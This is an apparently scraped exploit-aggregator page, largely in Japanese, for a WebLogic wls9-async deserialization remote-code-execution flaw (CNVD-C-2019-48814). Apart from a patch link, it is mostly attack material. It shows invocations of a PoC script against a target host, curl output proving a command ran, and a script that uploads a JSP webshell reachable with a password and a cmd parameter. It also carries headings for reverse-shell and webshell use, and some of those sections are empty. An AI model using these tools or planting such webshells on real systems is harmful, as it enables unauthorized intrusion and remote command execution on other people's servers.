## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JAS502N-CNVD-C-2019-48814
# CNVD-C-2019-48814
WebLogic wls9-async 逆シリアル化リモートコード実行の脆弱性
### weblogic 用のエコー PoC
### Patch update:
root@kitploit:~
https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
### 脆弱性の再現:
root@kitploit:~
http://10.10.20.166:7001/_async/AsyncResponseService
root@kitploit:~
curl -i http://10.10.20.166:7001/_async/favicon.ico
## CNVD-C-2019-48814 Video

root@kitploit:~
python CNVD-C-2019-48814.py -u http://10.10.20.166:7001 -p 1.txt
>>>>Common See:
write website favicon.ico
Don't Need RMI Server
http://10.10.20.166:7001/_async/favicon.ico
>>>>Request Success!
status_code:202
C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
HTTP/1.1 200 OK
Date: Thu, 25 Apr 2019 14:37:49 GMT
Accept-Ranges: bytes
Content-Length: 5
Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
root
## RMI を使用


### CVE-2017-10271 パッチ未適用
#### windows-linux-webshell
root@kitploit:~
upadte: カスタムwebshell名。windows または linux での webshell アップロードに対応
python async_webshell-all.py http://10.10.20.166:7001/ webshell.jsp
>>>Webshell:
http://10.10.20.166:7001//bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

#### resever_shell

#### command see

#### webshell
